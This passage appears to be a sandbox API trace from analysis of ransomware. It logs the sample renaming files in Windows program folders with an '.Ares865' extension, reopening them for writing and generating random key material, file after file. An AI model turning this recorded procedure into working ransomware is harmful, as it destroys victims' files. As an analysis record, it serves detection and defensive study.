[0119.833] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.Ares865") returned 92 [0119.833] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png.ares865"), dwFlags=0x1) returned 1 [0119.835] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=502) returned 1 [0119.835] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.836] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.836] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.839] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.840] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.Ares865") returned 92 [0119.841] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png.ares865"), dwFlags=0x1) returned 1 [0119.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=334) returned 1 [0119.843] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.844] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.844] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.848] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.849] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.849] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.849] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" [0119.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.Ares865") returned 90 [0119.851] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html.ares865"), dwFlags=0x1) returned 1 [0119.852] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.852] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19102) returned 1 [0119.852] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.858] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.860] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" [0119.860] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.Ares865") returned 91 [0119.860] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js.ares865"), dwFlags=0x1) returned 1 [0119.861] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.862] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65288) returned 1 [0119.862] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.863] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.863] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.875] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.875] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.875] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.877] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" [0119.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.Ares865") returned 93 [0119.877] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css.ares865"), dwFlags=0x1) returned 1 [0119.878] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4848) returned 1 [0119.879] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.880] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.880] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.882] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.883] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.883] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.884] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\en-US" [0119.884] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.Ares865") returned 67 [0119.884] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui.ares865"), dwFlags=0x1) returned 1 [0119.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.885] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0119.886] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.886] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.886] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.890] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.891] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.891] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.892] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.Ares865") returned 68 [0119.892] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui.ares865"), dwFlags=0x1) returned 1 [0119.894] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.895] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18944) returned 1 [0119.895] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.895] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.899] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.899] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.899] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.900] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Portable Devices", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Portable Devices") returned="C:\\Program Files (x86)\\Windows Portable Devices" [0119.901] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.Ares865") returned 66 [0119.901] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll.ares865"), dwFlags=0x1) returned 1 [0119.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\sqmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\windows portable devices\\sqmapi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.905] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189952) returned 1 [0119.905] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.906] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.906] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.933] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.933] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.936] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Photo Viewer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer") returned="C:\\Program Files (x86)\\Windows Photo Viewer" [0119.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.Ares865") returned 70 [0119.938] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe.ares865"), dwFlags=0x1) returned 1 [0119.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=92936) returned 1 [0119.940] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.959] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.Ares865") returned 69 [0119.961] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll.ares865"), dwFlags=0x1) returned 1 [0119.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingEngine.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingengine.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.963] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1853440) returned 1 [0119.964] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.964] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.964] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.091] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.Ares865") returned 64 [0120.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll.ares865"), dwFlags=0x1) returned 1 [0120.120] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoAcq.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoacq.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.120] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=917504) returned 1 [0120.120] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.121] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.173] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.186] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.Ares865") returned 65 [0120.187] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll.ares865"), dwFlags=0x1) returned 1 [0120.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.188] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34816) returned 1 [0120.189] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.225] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.225] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.Ares865") returned 67 [0120.226] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll.ares865"), dwFlags=0x1) returned 1 [0120.228] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll.Ares865" (normalized: "c:\\program files (x86)\\windows photo viewer\\photoviewer.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0120.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1456128) returned 1 [0120.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0120.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0120.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.319] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0120.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0120.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0120.340] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US") returned="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US" [0120.341] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.Ares865") returned 80 [0120.341] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows photo 